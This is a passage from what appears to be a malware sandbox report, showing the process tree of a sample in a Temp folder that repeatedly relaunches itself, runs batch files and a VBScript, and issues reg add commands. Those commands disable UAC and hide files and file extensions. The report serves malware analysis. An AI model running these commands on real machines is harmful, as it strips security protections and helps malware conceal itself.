        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        36⤵
        Modifies visibility of file extensions in Explorer
        
        PID:540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        37⤵
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        38⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        39⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        40⤵
        
        PID:108
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        41⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        42⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        43⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        44⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        45⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        46⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        47⤵
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        48⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        49⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        50⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        51⤵
        Modifies visibility of file extensions in Explorer
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        52⤵
        
        PID:2804
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        53⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        53⤵
        
        PID:2096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        51⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        51⤵
        Modifies registry key
        
        PID:1900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        51⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\wekoIscE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        51⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        52⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        49⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        49⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\fssAMEoQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        49⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1628
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        50⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        49⤵
        
        PID:592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        47⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\dGwocAQQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        47⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        48⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        47⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        47⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        45⤵
        Modifies registry key
        
        PID:2996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        45⤵
        
        PID:932
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\qSgMMMAY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        45⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        46⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        45⤵
        UAC bypass
        
        PID:2440
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZyccMwAI.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        43⤵
        
        PID:1088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        44⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        43⤵
        UAC bypass
        
        PID:2652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        43⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        43⤵
        
        PID:324
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\usQkEsok.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        41⤵
        
        PID:568
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        42⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        41⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        41⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        41⤵
        Modifies registry key
        
        PID:928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        39⤵
        Modifies registry key
        
        PID:3044
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\vYgAMgYw.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        39⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        40⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        39⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        39⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        37⤵
        Modifies registry key
        
        PID:2876
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\dygkksoM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        37⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        38⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        37⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        37⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        35⤵
        
        PID:532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        35⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        35⤵
        
        PID:1236
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\CWcsYcgc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        35⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        36⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\QMEsQkoA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        33⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        34⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        33⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        33⤵
        Modifies registry key
        
        PID:2184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        33⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        31⤵
        Modifies registry key
        
        PID:1716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        31⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        31⤵
        
        PID:700
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\rAAQIUQU.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        31⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        32⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        29⤵
        
        PID:568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        29⤵
        UAC bypass
        
        PID:2620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        29⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\meYwwckk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        29⤵
        
        PID:940
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        30⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        Modifies registry key
        
        PID:560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        27⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\CCUkIQIk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        27⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        28⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        27⤵
        
        PID:1624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        25⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        25⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        25⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\EAoYYIMA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        25⤵
        
        PID:948
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        26⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        23⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\eacEkQso.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        23⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        24⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        23⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        23⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        
        PID:736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        Modifies registry key
        
        PID:2556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\GqUAgYMI.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        21⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        22⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        
        PID:952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        Modifies registry key
        
        PID:1520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\NEIYkIgk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        19⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        
        PID:940
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        Modifies registry key
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sIQswYQk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        17⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:1884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1324
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\pWQMkoEg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        15⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        
        PID:816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        
        PID:960
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\bkAYAIok.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        13⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:1820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\mKckUoMI.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        11⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        
        PID:2312
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\WSEscUcc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        9⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        Modifies registry key
        
        PID:880
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\aqEgAQUk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        7⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        
        PID:1716
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        
        PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\PaYAsAEU.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        5⤵
        
        PID:2184
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:1284
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:2652
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:1840
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\HscQEAUM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:2232
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:1708
- - C:\Windows\SysWOW64\reg.exe
